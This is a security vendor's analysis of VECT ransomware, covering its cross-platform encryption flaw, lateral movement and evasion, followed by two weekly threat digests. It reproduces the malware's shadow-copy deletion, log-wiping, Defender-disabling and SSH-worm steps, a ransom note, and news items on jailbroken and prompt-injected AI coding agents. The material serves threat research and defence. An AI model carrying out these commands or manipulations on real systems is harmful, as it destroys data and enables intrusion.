Through an account on BreachForums, Check Point Research got access to the panel and ransomware builder. Here, an affiliate has the option to build three different payloads: Windows, Linux and ESXi (as well as a dedicated tool for data exfiltration, which is not yet available at the time of writing):

Figure 5: VECT builder panel.

Check Point Research analyzed all three payloads, uncovering various flaws and oversights – revealing that, behind the professional facade, VECT ransomware is not a technically sophisticated service.

Ransomware Cross-Platform Overview

As detailed in the following sections, VECT 2.0 targets Windows, Linux, and VMware ESXi through three distinct variants built on a shared codebase. While platform-specific disruption logic differs, the core encryption engine is identical across all three, a design decision that ensures the flaw described in the next section affects every supported platform equally.

All three variants are statically compiled C++ executables embedding the libsodium cryptographic library, accept operator-supplied command-line flags, support lateral movement, and produce an identical on-disk encrypted file format. The table below summarizes the key properties across all three variants.

PropertyWindowsLinuxESXi
ArchitecturePE64 (x86-64)ELF64 (x86-64)ELF64 (x86-64)
ToolchainMinGW-w64 / C++GCC / C++GCC / C++
Crypto librarylibsodium (static)libsodium (static)libsodium (static)
CipherChaCha20-IETF (RFC 8439)ChaCha20-IETF (RFC 8439)ChaCha20-IETF (RFC 8439)
Key size32 bytes32 bytes32 bytes
Nonce size12 bytes12 bytes12 bytes
Small file threshold131,072 bytes131,072 bytes131,072 bytes
Large file chunks444
Chunk offset formulafile_size / 4 × indexfile_size / 4 × indexfile_size / 4 × index
Max chunk size32,768 bytes32,768 bytes32,768 bytes
Nonces written to disk1 (last chunk only)1 (last chunk only)1 (last chunk only)
Encrypted extension.vect.vect.vect
Ransom note filename!!!READ_ME!!!.txt!!!READ_ME!!!.txt!!!READ_ME!!!.txt
Default target pathAll drives//vmfs/volumes
Lateral movementWMI / DCOM / SMB / SC / Schtasks / PSRemotingSSH / SCPSSH / SCP
Geofencing / CIS bypassNoYes (locale + timezone)Yes (locale + timezone)
Anti-debugProcess scan + kernel object queryTracerPid checkTracerPid check
Encryption mode flagsN/AParsed, not implementedParsed, not implemented

Nonce Flaw – “Large File” Destruction

Correct Cryptographic Identification

Before describing the flaw, a correction to existing public reporting is warranted. Several published analyses describe VECT’s encryption as ChaCha20-Poly1305 AEAD. This is incorrect as we confirmed that all three versions (Windows, Linux, ESXi) use the raw, unauthenticated ChaCha20 stream cipher in its IETF variant (RFC 8439) via libsodium’s crypto_stream_chacha20_ietf_xor. The _ietf designation refers specifically to the standardized 96-bit (12-byte) nonce and 32-bit counter parameterization distinct from Bernstein’s original 64-bit nonce form.

The ChaCha20-Poly1305 AEAD construction appends a 16-byte Poly1305 authentication tag to each ciphertext. No such tag exists in any VECT-encrypted file. The on-disk format contains only raw ciphertext followed by a 12-byte nonce – no MAC, no integrity protection, no authenticated encryption of any kind.

Figure 6: VECT’s per-chunk encryption helper – 12-byte nonce is generated by randombytes() and passed directly into crypto_stream_chacha20_ietf_xor.

This misattribution likely stems from researchers trusting the threat actors’ own initial forum advertisement where VECT themselves incorrectly named the encryption scheme they use.

Figure 7: VECT initial forum advertisement – incorrect naming of the encryption scheme.

Overview

All three VECT 2.0 variants share a critical implementation flaw that causes any file larger than 131,072 bytes (128 KB, smaller even than a simple document) to be permanently and irrecoverably destroyed rather than encrypted for later decryption. The malware encrypts four independent chunks of each ”large file” using four freshly generated random 12-byte nonces, but appends only the final nonce to the specific encrypted file on disk. The first three nonces, each required to decrypt its respective chunk, are generated, used, and silently discarded. They are never stored on disk, in the registry, or transmitted to the operator.

Because ChaCha20-IETF requires both the 32-byte key and the exact matching 12-byte nonce to reverse each chunk, the first three quarters of every large file are unrecoverable by anyone including the ransomware operator who cannot provide a working decryption tool even after ransom payment. Since the vast majority of operationally critical files exceed this “large-size” threshold, VECT 2.0 functions in practice as a data wiper with a ransomware facade.

Small File Processing

For files not exceeding 131,072 bytes (128 KB), the entire content is encrypted in a single pass. One 12-byte nonce is generated, used to encrypt the full file in-place, and appended to the end of the file. The resulting on-disk layout is:

[ ChaCha20-IETF ciphertext - full file ][ nonce - 12 bytes ]

For this size class, the format is internally consistent and the appended nonce is sufficient to reverse the single encryption pass. These files are fully decryptable.

Figure 8: Small file processing (single ChaCha20-IETF pass, 12-byte nonce appended at EOF).

Large File Processing – The Flaw

For files exceeding 131,072 bytes (128 KB), VECT divides the file into four chunks at quarter-file offsets derived from the file size:

  • Quarter size: file size divided by 4
  • Chunk start offsets: 0, ¼, ½, ¾ of the file
  • Chunk size per offset: up to 32,768 bytes (32 KB), or the remaining file length if shorter

The encryption loop processes each chunk in sequence. The per-chunk encryption helper is called once per iteration and on every call it generates a fresh cryptographically random 12-byte nonce via libsodium’s randombytes(), writing it into a single shared output buffer passed by the caller.

Figure 9: The per-chunk encryption helper.

Because all four calls receive the same buffer address, each new nonce overwrites the previous one. After the loop completes, only the nonce from the fourth/final chunk remains in the buffer and this is the only nonce appended to the file.

Figure 10: Large file processing (4 chunks encrypted with 4 unique nonces; a single nonce appended at EOF).

The three discarded nonces are outputs of randombytes() (which on Windows internally resolves to SystemFunction036 / RtlGenRandom in advapi32.dll, forwarding to ProcessPrng in bcryptprimitives.dll; on Linux and ESXi it reads from the kernel CSPRNG via getrandom() or /dev/urandom through libsodium’s safe_read()), cryptographically unpredictable values that are never stored anywhere after the buffer is overwritten. There is no sidecar file, no registry entry, and no network exfiltration of nonce material in any of the three variants.

Cross-Platform Confirmation

The flaw is structurally identical across all three platform variants. In each case, the per-chunk encryption helper generates a fresh random nonce on every call and writes it into the same caller-supplied 12-byte buffer; all four iterations of the loop share this buffer; and a single 12-byte write to the end of the file follows the loop.

The ESXi variant also performs a zero-block check before each encryption call, where chunks consisting entirely of zero bytes are skipped (an optimization for sparse VMDK files). This does not affect the nonce flaw; the shared buffer is still overwritten on each non-skipped call and only the final surviving nonce reaches disk.

The flaw predates VECT 2.0. CPR’s analysis of an older ESXi variant identified in the wild prior to the 2.0 release confirms the identical four-chunk loop, quarter-offset calculation, shared nonce buffer, and single EOF nonce write – unchanged from the operator’s first publicly observed deployment through every known release.

Impact

File regionNonce on diskRecoverable
Small file ≤ 128 KB – full contentYes – appended at EOFFully
Large file – chunk at offset 0 (up to 32 KB)NoPermanently lost
Large file – chunk at offset ¼ (up to 32 KB)NoPermanently lost
Large file – chunk at offset ½ (up to 32 KB)NoPermanently lost
Large file – chunk at offset ¾ (up to 32 KB)Yes – appended at EOFLast chunk only
Large file – all bytes outside the four chunksN/A – not encryptedPlaintext, unchanged

Files commonly exceeding 128 KB span virtually everything from typical office documents, spreadsheets, and images to virtual machine disk images, database files, archives, and backups – precisely those most critical to business continuity and most targeted by ransomware operators. For this dominant file class, VECT 2.0 cannot function as recoverable ransomware; it is operationally a data wiper. Victims who pay the ransom cannot receive a functional decryptor for their most critical files – not because the operator is uncooperative, but because the nonces required for decryption no longer exist.

Windows Locker

The Windows variant targets local, removable, and network-accessible storage, renames encrypted files with the .vect extension, drops a ransom note and a branded desktop wallpaper, and executes defense-evasion, persistence, and lateral-movement routines. Of particular note is a comprehensive anti-analysis suite targeting 44 specific security and debugging tools, alongside a safe-mode persistence mechanism and multiple remote-execution methods for lateral spread.

Command-Line Interface and Default Behavior

The locker exposes the following operator options:

  -h, --help          Help
  -v, --verbose       Verbose output
  -p, --path <dir>    Target specific path
  -c, --creds <b64>   Override credentials
  --gpo               Enable GPO spread (default: on)
  --no-gpo            Disable GPO spread
  --mount             Enable network mount (default: on)
  --no-mount          Disable network mount
  --stealth           Enable self-delete (default: on)
  --no-stealth        Disable self-delete
  --force-safemode    Force safemode boot
Figure 11: VECT 2.0 Windows version – command-line arguments processing.

GPO spread, network mounting, and self-deletion are all on by default. An operator deploying without flags, for example via Group Policy or a remote execution primitive, activates the full impact chain automatically, including spread, hidden volume access, and post-execution cleanup.

File Encryption and Renaming

Each target file is renamed to append .vect before encryption. The file is then opened in-place and encrypted using the ChaCha20-IETF scheme described in the preceding section. The nonce flaw applies identically: files larger than 131,072 bytes (128 KB) lose the first three chunk nonces permanently, thus resulting in large file destruction rather than encryption.

The encryption engine spawns worker threads in a fixed 1:7 scanner-to-encryptor ratio derived from a CPU-count-tiered multiplier: ×8 for machines with up to 4 CPUs, ×6 for 5-8 CPUs, and ×4 beyond that, hard-capped at 256 total. On a typical 8-CPU target, this produces 6 scanner and 42 encryptor threads simultaneously competing for the same disk I/O channels – overkill by any measure, and a thread count that would make any seasoned ransomware developer laugh. Families like LockBit cap their pools at 1-2× CPU count for good reason; spawning six times as many threads as there are CPUs does not encrypt files faster; it simply means the operating system spends more time switching between threads than doing useful work. This is a textbook mistake made by developers who read about parallelism but skipped the part about profiling. The fact that it is shipped in a supposedly operational ransomware tool speaks volumes about the maturity of whoever is behind this project.

Figure 12: VECT 2.0 Windows version – 48 threads for 8-CPU target.

Ransom Note and Wallpaper

After encrypting each drive target, the locker drops !!!READ_ME!!!.txt, assembled from multiple decoded string fragments (see the ransom note in the Appendix). Then, it generates a replacement desktop wallpaper (dvm3_wall.bmp) that carries the VECT 2.0 brand banner, as shown in the image below.

Figure 13: The desktop wallpaper used by the VECT 2.0 Windows locker version.

Target Selection and Exclusions

Drive enumeration covers logical drives and network-mapped resources. The file selection logic skips the following to leave the operating system functional enough for the victim to access the payment portal:

Excluded directories: Windows, Windows.old, Boot, $Recycle.Bin, System Volume Information, Program Files, Program Files (x86), ProgramData

Excluded boot files: bootmgr, bootmgr.efi, bootmgfw.efi, bootsect.bak, boot.ini, ntldr

Excluded extensions: .exe, .dll, .sys

These represent the builder defaults; affiliates may configure additional exclusions at sample generation time.

Process and Service Disruption

When running with elevated privileges, the locker stops services via the Windows Service Control Manager and terminates the following processes to release file handles before encryption begins: sql.exe, oracle.exe, mysqld.exe, excel.exe, winword.exe, outlook.exe, firefox.exe, thunderbird.exe.

Unlike typical RaaS offerings where affiliates can customize kill lists, this list is hardcoded by the builder and cannot be modified at sample generation time.

Persistence and Safe-Mode Preparation

When --force-safemode is active, the locker executes bcdedit /set {default} safeboot minimal to configure the next boot into minimal safe mode, then writes its own executable path into the Windows registry under the safe-boot service load path with value "Service". This ensures the locker runs on the subsequent safe-mode boot, where the majority of security products are disabled. After completing execution, the boot configuration entry is removed to avoid persistent boot loops. Task Manager is also disabled via the registry for the duration of execution.

Lateral Movement

The locker contains multiple encoded remote-execution script templates enabling propagation to additional Windows hosts using operator-supplied credentials (--creds). Methods include: admin share file copy, Windows Credential Manager storage via cmdkey, WMI execution, DCOM/MMC application instantiation, remote scheduled task creation, remote service installation via sc.exe, and PowerShell remoting. Host discovery combines Windows domain enumeration with a local subnet sweep using network adapter information.

Anti-Analysis

The Windows variant implements three layered analyst-environment detection mechanisms. All three detection mechanisms are present in compiled form but are never invoked. The cross-reference analysis confirms zero call sites reach any of the three functionalities in this build. This is consistent with a conditional compilation flag that was left disabled at build time, and represents a meaningful gap: an analyst running this sample under any of the targeted tools will not trigger any evasive response.

No code obfuscation is applied, although the most operator-facing strings are concealed using a rotating 64-bit XOR scheme: each byte is XORed against the corresponding byte of a fixed 64-bit key, cycling through all eight key bytes.

Figure 14: An example XOR-based string decryption (Windows locker).
  • Running-process scan
    A full process snapshot is taken and each process name is compared against a hardcoded list of 44 analysis tools (originally 47, but we removed the duplicates), covering debuggers, import reconstructors, PE utilities, process monitors, network sniffers, and sandbox controllers (the full list of detected tools can be found in the Appendix section).
Figure 15: Detection of 44 analysis tools.
  • Parent process check
    The parent process image path is retrieved and matched against a list of debugging environments: devenv, windbg, x64dbg, x32dbg, ollydbg, ida. A process launched from any of these is treated as running under analysis.
  • Kernel debug-object query
    The Windows native API NtQueryInformationProcess is resolved dynamically from ntdll.dll at runtime avoiding static import detection and queried for the ProcessDebugObjectHandle information class. A non-null return indicates an attached debugger.

Defense Evasion and Cleanup

ActionMethod
Disable Windows DefenderSet-MpPreference via PowerShell disables realtime, behavior, IOAV, and script scanning
Delete shadow copiesvssadmin delete shadows /all /quiet
Clear event logswevtutil cl Application, Security, System, Windows PowerShell
Delete PowerShell historyPSReadLine\\ConsoleHost_history.txt
Delete recent file entries%APPDATA%\\Microsoft\\Windows\\Recent\\*
Self-deleteDelayed cmd /c with ping stall followed by forced deletion

ESXi Locker – The Hypervisor Ransomware

The ESXi variant of the VECT ransomware targets VMware ESXi hypervisors and employs geofencing and anti-debugging before disrupting various system services, wiping logs, and encrypting victim files, defaulting to the VMware File System mount point at /vmfs/volumes. The malware also supports SSH-based lateral movement, where the ransomware tries to use available credentials to connect to known SSH hosts.

Anti-Analysis and Geofencing

Before executing any malicious code, the ransomware employs two simple anti-analysis checks: First, it checks if it is running in a CIS state, and if so, exits without encryption. The malware runs timedatectl and compares the time zones against a blacklist and checks the LANG and LC_ALL environment variables, validating that the country code does not match one of the excluded countries.

Figure 16: Country code blacklist.

Before 2022 CIS checks were very common in RaaS malware. During the start of the Russo-Ukrainian war, most RaaS programs removed Ukraine from the CIS countries list. During recent years these checks have been largely removed from ransomware. VECT including such checks and even adding Ukraine to the list of exclusions is rather uncommon. Check Point Research has two theories regarding this observation: either this code was AI generated, where LLMs were trained with Ukraine being part of CIS or VECT used an old code base for their ransomware.

Additionally to these checks, the malware probes for the presence of a debugger by checking the value of TracerPid in /proc/self/status, exiting if any tracing process is found.

To obfuscate from basic static analysis, the authors decided to implement strings as stack strings. Some strings, most notably the different command line options, are additionally XORed with a single byte key:

Figure 17: XOR encrypted command line switches (ESXi variant).

Command-Line Interface and SSH lateral movement

The following command line options are available:

  --path <dir>       Target directory (default: /vmfs/volumes)
  --spread           Enable SSH lateral movement
  --fast             Fast mode: encrypt only 1MB
  --medium           Medium mode: encrypt 4 parts (64MB each)
  --secure           Secure mode: encrypt 100% (default)
  --no-kill-vms      Don't kill running VMs (encrypt only)
  --verbose          Enable verbose output
  --help             Show this help message

Operators can seemingly decide between three different encryption methods, --fast, --medium, and --secure, to find a tradeoff between speed and thoroughness of the encryption – however, the ransomware does not actually implement these different modes – the code parses them into variables, but they are never read back. Every execution, regardless of operator-selected flag, applies the same hardcoded thresholds: 131,072-byte large-file boundary and 32,768-byte maximum chunk size. The same goes for the Linux variant we describe further below.

If the --spread option is supplied, the malware tries to spread laterally like an SSH based worm:

  • All readable keys from the home and /root directories are extracted
  • /etc/ssh/ssh_config and ~/.ssh/config are read and parsed for any hostnames and corresponding usernames
  • All known_hosts files are zeroed out to avoid any host-key warnings
  • For each host, the locker tries to connect with each of the collected usernames as well as a hardcoded list of common usernames
  • If a connection succeeds, the malware copies itself over via scp and executes itself via ssh

Service Disruption, Log Wiping and Encryption

Before running any encryption, the malware makes sure to shut down any services that could hold any file locks or could otherwise interfere with the process. It starts by disabling the ESXi firewall via the esxcli utility, as well as specific firewall rulesets and shutting down various ESXi health monitoring processes:

Figure 18: The esxcli commands to disable the firewall and rulesets.

Afterwards, it proceeds with shutting down other services and processes, like databases, backup tools, Hypervisor related services and security products. Shutdown is either attempted gracefully, via systemctl stop and service stop, or aggressively via pkill -9 and systemctl disable --now . A full list of targeted services can be found in the Appendix.

To remove any locks from virtual machine disk files, the VECT locker invokes various legitimate administration utilities to shut down any running virtual machines. However, contrary to its name, the locker not only targets ESXi but also other common Hypervisors:

ToolHypervisor targeted
vmware-cmd / vmrunVMware products
VBoxManageOracle VirtualBox
virshlibvirt / KVM / QEMU
esxcliVMware ESXi
xm / xlXen Hypervisor

Next, various shell history files and logs in /var/log are removed or zeroed-out. This includes logs from hypervisors, container services, databases, web servers, audit logs or other system logs and journals (see the Appendix for a complete list).

After this prelude, the actual encryption process is kicked off: If no path is supplied, the default path of /vmfs/volumes is used, which is the default VMware File System (VMFS) mount point for all datastores. In a multi-threaded process, each datastore is searched for files to encrypt. The ransomware maintains a sensible blacklist, which excludes several directories hosting mainly executables, system files or config files:

/proc, /sys, /dev, /bin, /sbin, /lib64, /usr, /etc, /boot, /var/run, /var/lib, /bootbank, /altbootbank, /store, /locker, /vmfs/volumes/.sdd.sf, /vmfs/volumes/.fbb.sf, /vmfs/volumes/.fdc.sf, /vmfs/volumes/.pb, /vmfs/volumes/.vh

Again, the thread count is chosen rather excessively, by multiplying the amount of CPU cores by 4, clamping the value between a minimum of 32 and a maximum of 256.

By sharing a codebase with the other versions, see encryption process is the same and contains the same flaw in its implementation: it only includes the latest nonce when chunk-processing a big file:

Figure 19: Encryption flaw (ESXi version).

Finally, if the malware was configured to do so, the ransom note is dropped to /home, /root and /tmp, as well as in various system paths:

PathPurpose
/etc/motdLogin banner (message of the day)
/etc/issuePre-login system banner
/etc/issue.netNetwork login banner
/etc/profile.d/vector_notice.shShell script displaying the note, ran on shell login

Linux Locker

The Linux version is built on the same codebase as the ESXi and implements a subset of its functionality. This becomes apparent when comparing the execution flow of the main functions side-by-side:

Figure 20: Execution flow ESXi locker (left) vs. Linux locker (right).

Just like the ESXi version, the malware first kills any services and processes that could interfere with the encryption, shuts down any VMs (interestingly also including ESXi VMs) and wipes system logs and shell history files. Then, encryption is started, with the system root / as the default path and ransom notes are written to disk. The Linux locker, just like its ESXi counterpart, supports the --spread SSH lateral movement functionality. Due to the shared codebase, the locker also fails to save the first three nonces when encrypting large files, making fill recovery of big files impossible.

The Linux version also has another oversight in the implementation of the encryption. Just like in the ESXi locker, the command line flags are supposed to be encrypted, but the authors accidentally designed a double XOR encryption scheme, which cancels out the encryption and leads to plain text strings being present in the binary:

Figure 21: Double XOR “encryption”.

On a side note, even the ASCII art is broken because the developers forgot to escape the backslash characters:

Figure 22: Broken ASCII art.

Conclusion

VECT 2.0 presents an ambitious threat profile with multi-platform coverage, an active affiliate program, supply-chain distribution via the TeamPCP partnership, and a polished operator panel. In practice, the technical implementation falls significantly short of its presentation.

Check Point Research’s analysis reveals that the ransomware’s encryption flaw is not a minor edge case but a fundamental design error affecting virtually every file of consequence. At a threshold of only 128 KB, smaller than a typical email attachment or office document, what the code classifies as a large file encompasses not just VM disks, databases, and backups, but routine documents, spreadsheets, and mailboxes. In practice, almost nothing a victim would care to recover falls below this boundary.

The nonce-handling bug is identical across all three platform variants and as confirmed through analysis of an earlier variant identified in the wild prior to the VECT 2.0 release, has been present since the operator’s first publicly observed deployment. It has never been corrected. Victims who pay the ransom cannot receive a working decryptor for their largest files, not through operator deception, but because the information required for decryption was irrecoverably destroyed at the moment of encryption. An overly aggressive thread scheduler that actively harms encryption throughput, and three fully compiled but permanently unreachable anti-analysis routines, further reinforce this assessment: the authors know what features a professional ransomware tool should have, but demonstrably struggled to implement them correctly or at all.

Beyond the nonce flaw, CPR identified a pattern of incomplete implementation: advertised encryption modes that are parsed but never applied, string obfuscation routines that accidentally cancel themselves out, and a cipher incorrectly described in public reporting. Together these findings paint a picture of a group with operational ambition, reflected in the BreachForums open-affiliate model and the TeamPCP supply-chain campaign, but with cryptographic and software engineering maturity that does not match the scale of the operation they are attempting to run.

The announcement of forthcoming “Cloud Lockers” and the low technical barrier introduced by the open-affiliate model both warrant continued monitoring. As CPR has demonstrated, the current implementation has severe limitations but those can be corrected in a future version, and the distribution infrastructure to deploy such a version at scale already exists.

Protections

Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect against the attacks and threats described in this report.

IOCs

SHA-256VECT Version
a7eadcf81dd6fda0dd6affefaffcb33b1d8f64ddec6e5a1772d028ef2a7da0f2ESXi
58e17dd61d4d55fa77c7f2dd28dd51875b0ce900c1e43b368b349e65f27d6fddESXi
e1fc59c7ece6e9a7fb262fc8529e3c4905503a1ca44630f9724b2ccc518d0c06Linux
8ee4ec425bc0d8db050d13bbff98f483fff020050d49f40c5055ca2b9f6b1c4dWindows
9c745f95a09b37bc0486bf0f92aad4a3d5548a939c086b93d6235d34648e683fWindows
e512d22d2bd989f35ebaccb63615434870dc0642b0f60e6d4bda0bb89adee27aWindows

Appendix

Analysis tools detected by Windows locker:

ollydbg.exex64dbg.exex32dbg.exewindbg.exe
x96dbg.exeida.exeida64.exeidag.exe
idag64.exeidaw.exeidaw64.exeidaq.exe
idaq64.exeimmunitydebugger.exeImportREC.exeMegaDumper.exe
scylla.exescylla_x64.exescylla_x86.exeprotection_id.exe
reshacker.exeResourceHacker.exeprocesshacker.exeprocexp.exe
procexp64.exeprocmon.exeprocmon64.exeautoruns.exe
autorunsc.exefilemon.exeregmon.exewireshark.exe
dumpcap.exehookexplorer.exePETools.exeLordPE.exe
SysInspector.exeproc_analyzer.exesysAnalyzer.exesniff_hit.exe
joeboxcontrol.exejoeboxserver.exefiddler.exehttpdebugger.exe

Services targeted by Linux/ESXi locker:

acronisacronis_agentaideamanda
avastavgBackupExecAgentbareos-fd
bitdefenderborgcarbonblackcassandra
cb-sensorchkrootkitclamavclamav-daemon
clamav-freshclamclamdcockroachconsul
couchdbcylanceesetetcd
falcon-sensorfreshclaminfluxdbkaspersky
kvmlibvirtdlynismariadb
mariadbdmcafeememcachedmongod
mongodbmysqlmysqldneo4j
ossecpostgrespostgresqlqemu
rclonerdiff-backupredisredis-server
resticrkhunterrsnapshotsentinelone
sophossymantecsyncthingtripwire
vboxaddVBoxClientvboxdrvVBoxHeadless
vboxserviceVBoxServiceveeamVeeamDeploymentSvc
virt-installvirt-managervmwarevmware-authd
vmware-hostdvmware-rawdiskCreatorvmware-trayvmware-usbarbitrator
vmware-uservmware-vmxvmware-vprobewazuh
wazuh-agentxenxenconsoledxend
xenstored

Logs targeted by Linux/ESXi locker:

Log files: /var/log/syslog, /var/log/messages, /var/log/debug, /var/log/secure, /var/log/auth.log, /var/log/kern.log, /var/log/daemon.log, /var/log/user.log, /var/log/mail.log, /var/log/mail.err, /var/log/cron.log, /var/log/boot.log, /var/log/dmesg, /var/log/faillog, /var/log/lastlog, /var/log/tallylog, /var/log/wtmp, /var/log/btmp, /var/log/utmp, /var/run/utmp

Rotate logs (Wildcards): /var/log/syslog.*, /var/log/messages.*, /var/log/auth.log.*, /var/log/auth.log*, /var/log/secure.*, /var/log/secure*, /var/log/kern.log.*, /var/log/*.gz, /var/log/*.1, /var/log/*.old, /var/log/cron*, /var/log/ufw.log*, /var/log/firewalld*, /var/log/audit/audit.log*, /var/log/dpkg.log*, /var/log/yum.log*, /var/log/dnf.log*, /var/log/apt/*, /var/log/cloud-init*.log

Application specific logs: /var/log/apache2/*, /var/log/httpd/*, /var/log/nginx/*, /var/log/mysql/*, /var/log/postgresql/*, /var/log/mongodb/*, /var/log/redis/*, /var/log/docker/*, /var/log/containers/*, /var/log/pods/*, /var/log/journal/*, /run/log/journal/*, /tmp/*.log, /var/tmp/*.log

Shell & command history files: .bash_history, .zsh_history, .mysql_history, .psql_history, .python_history, .lesshst, .viminfo , /root/.ash_history (ESXi locker only)

ESXi specific logs: /var/log/vmkernel.log, /var/log/vmkwarning.log, /var/log/vmksummary.log, /var/log/hostd.log, /var/log/vpxa.log, /var/log/fdm.log, /var/log/shell.log, /var/log/syslog, /var/log/vobd.log, /var/log/vmware/*

Ransom Note:

  !!! README !!!                                                                                                                                                                             
  
  ===============                                                                                                                                                                            
   :::     ::: :::::::::: :::::::: :::::::::::                                                                                                                                             
   :+:     :+: :+:       :+:    :+:    :+:                                                                                                                                                   
   +:+     +:+ +:+       +:+           +:+                                                                                                                                                   
   +#+     +:+ +#++:++#  +#+           +#+
    +#+   +#+  +#+       +#+           +#+
     #+#+#+#   #+#       #+#    #+#    #+#
       ###     ########## ########     ###
  ===============

  Dear Management, all of your files have been encrypted with ChaCha20 which is an unbreakable encryption algorithm.
  Sadly, this is not the only bad news for you. We have also exfiltrated your sensitive data, consisting mostly of databases, backups and other personal information
  from your company and will be published on our website if you do not cooperate with us.

  The only way to recover your files is to get the decryption tool from us.

  To obtain the decryption tool, you need to:
  1. Open Tor Browser and visit: <http://vectordntlcrlmfkcm4alni734tbcrnd5lk44v6sp4lqal6noqrgnbyd.onion/chat/REDACTED>
  2. Follow the instructions on the chat page
  3. Receive a sample decryption of up to 4 small files
  4. We will provide payment instructions
  5. After payment, you will receive decryption tool

  WARNING:
  - Do not modify encrypted files
  - Do not use third party software to restore files
  - Do not reinstall system

  If you violate these rules, your files will be permanently damaged.

  Files encrypted: [N]
  Total size: [size] bytes
  Unique ID: REDACTED

  Backup contact (Qtox): 1A51DCBB33FBF603B385D223F599C6D64545E631F7C870FFEA320D84CE5DAF076C1F94100B5B

The post VECT: Ransomware by design, Wiper by accident appeared first on Check Point Research.

27th April – Threat Intelligence Report

By: urias
27 April 2026 at 14:07

For the latest discoveries in cyber research for the week of 27th April, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Vercel, a frontend cloud platform, has disclosed a security incident linked to a compromise at Context.ai, where stolen OAuth tokens enabled unauthorized access through a connected app. The company reported access to employee information, internal logs, and a subset of environment variables, while stating that the most sensitive secrets were not included.
  • France Titres, France’s authority for identity and registration documents, has detected a data breach on April 15. The incident may have exposed names, birth dates, email addresses, login IDs, and some physical addresses and phone numbers. A hacker has offered purported agency data for sale on the dark web.
  • UK Biobank, a UK research organization, has confirmed a breach after de-identified health data on 500,000 volunteers was advertised for sale on Chinese marketplaces. Officials said listings were removed and believed unsold, while access was suspended, the research platform was shut down, and download limits were imposed.
  • Bitwarden, a popular password manager, has suffered a supply-chain attack after a malware-tainted CLI release was published to npm on April 22. Bitwarden said 334 developers installed version 2026.4.0 during a brief window, potentially exposing credentials after a hijacked GitHub account was abused, while vault data remained unaffected.

AI THREATS

  • Researchers have flagged unauthorized access to Anthropic’s Claude Mythos Preview, an unreleased AI cyber model, through a third-party vendor environment. A small Discord group reportedly used shared contractor accounts, API keys, and predictable URLs to reach the system. Anthropic said it is investigating and has not seen impact to core systems.
  • Researchers observed Bissa Scanner, an AI-assisted exploitation platform using Claude Code and OpenClaw to support mass scanning, exploitation, and credential harvesting. The focus of the operation was exploitation of React2Shell (CVE-2025-55182), while it scanned millions of targets, confirmed over 900 compromises, and collected tens of thousands of exposed environment files.
  • Researchers highlighted a prompt-injection exploit chain in Google’s Antigravity agentic IDE that enabled sandbox escape and remote code execution. The flaw abused a file search tool that ran before security checks, letting attackers convert a benign prompt into system compromise, even in Secure Mode. The vulnerability was patched by Google.

VULNERABILITIES AND PATCHES

  • Microsoft issued out-of-band fixes for CVE-2026-40372, a critical ASP.NET Core privilege escalation flaw rated 9.1. A bug in Data Protection versions 10.0.0 to 10.0.6 could let attackers forge cookies and antiforgery tokens, impersonate users, and gain SYSTEM-level access on Linux or macOS deployments.
  • Apple released fixes for CVE-2026-28950 in iOS and iPadOS, a Notification Services bug that retained deleted alerts and allowed recovery of sensitive message previews. The flaw affected many iPhone and iPad models, enabled forensic access with device possession and allegedly allowed law enforcement agencies access to incoming messages from encrypted messaging apps.
  • LMDeploy is affected by CVE-2026-33626, a high-severity server-side request forgery flaw in the open-source toolkit for deploying large language models. Active exploitation began within 13 hours of disclosure, with attackers abusing the image loader to reach cloud metadata, probe internal services, and support lateral movement.
  • End of life D-Link DIR-823X routers are affected by CVE-2025-29635, a remote code execution flaw exploited to deploy a Mirai-based botnet. Akamai reported that attackers are sending requests which fetch and run scripts to conscript devices for denial of service attacks, with no patches expected for the affected models.

Check Point IPS provides protection against this threat (D-Link DIR-823X Command Injection (CVE-2025-29635))

THREAT INTELLIGENCE REPORTS

  • Check Point Research has analyzed The Gentlemen ransomware-as-a-service operation, a group that emerged in 2025 and offers encryptors for Windows, Linux, NAS, BSD, and ESXi systems. The report details its underground recruitment, leak site model, Tox-based negotiations, and SystemBC proxy infrastructure used for persistence and access.
  • Researchers mapped a Mustang Panda espionage campaign targeting India’s banking sector and South Korean policy circles, deploying the updated LOTUSLITE backdoor. The group used HDFC-themed help files and fake banking pop-ups, and leveraged DLL sideloading to install the malware.
  • Researchers uncovered a supply-chain attack that inserted credential-stealing malware into Checkmarx developer tools on Docker Hub and Visual Studio Code, including KICS images downloaded over five million times. The malware collects cloud and developer credentials and spreads through stolen GitHub tokens and workflows, with TeamPCP suspected.
  • Researchers tracked a coordinated malvertising campaign abusing Google Ads to impersonate major cryptocurrency platforms like Uniswap, Morpho, and Ledger. The operation uses Google-hosted redirect pages, cloaking, and cloned sites to deploy wallet drainers, seed phrase theft pages, and fake extensions, resulting in at least $1.27 million stolen.

 

The post 27th April – Threat Intelligence Report appeared first on Check Point Research.

Received — 23 April 2026 Check Point Research

20th April – Threat Intelligence Report

By: urias
20 April 2026 at 16:24

For the latest discoveries in cyber research for the week of 20th April, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Booking.com, the Amsterdam-based travel platform, has confirmed a data breach after unauthorized parties accessed reservation data linked to some customers. Exposed information included names, email addresses, phone numbers, physical addresses, and booking details, creating phishing risk, while the company reset reservation PINs and notified affected users.
  • McGraw-Hill, a global educational publisher, has disclosed a data breach following an extortion attempt after attackers accessed its Salesforce environment. Leaked data from about 13.5 million accounts includes names, email addresses, phone numbers, and physical addresses, while no payment card information was reported exposed.
  • EssentialPlugin, a WordPress plugins development firm, has suffered a supply chain compromise that pushed malicious updates to more than 30 plugins installed on thousands of websites. The backdoored code enabled unauthorized access and spam page creation, and WordPress.org closed the affected plugins while infections may remain.
  • Basic-Fit, Europe’s largest gym chain, has reported a data breach after attackers accessed a franchise-wide system used to track club visits. The incident exposed bank account details and personal data for about one million members across six countries, while passwords and identity documents were not affected.

AI THREATS

  • Researchers unveiled that a lone hacker weaponized Claude Code and OpenAI’s GPT-4.1 to breach nine Mexican government agencies. AI-driven commands accelerated reconnaissance, issuing 5,317 actions across 34 sessions and accessing 195 million taxpayer records and 220 million civil records, after safety filters were bypassed through prompt manipulation and an injected hacking manual.
  • Researchers detailed a phishing campaign that impersonates Anthropic’s Claude AI with a fake Claude Pro installer for Windows. The package displays a working application to distract victims while abusing a trusted program to sideload PlugX malware, enabling remote access and persistence on compromised systems.
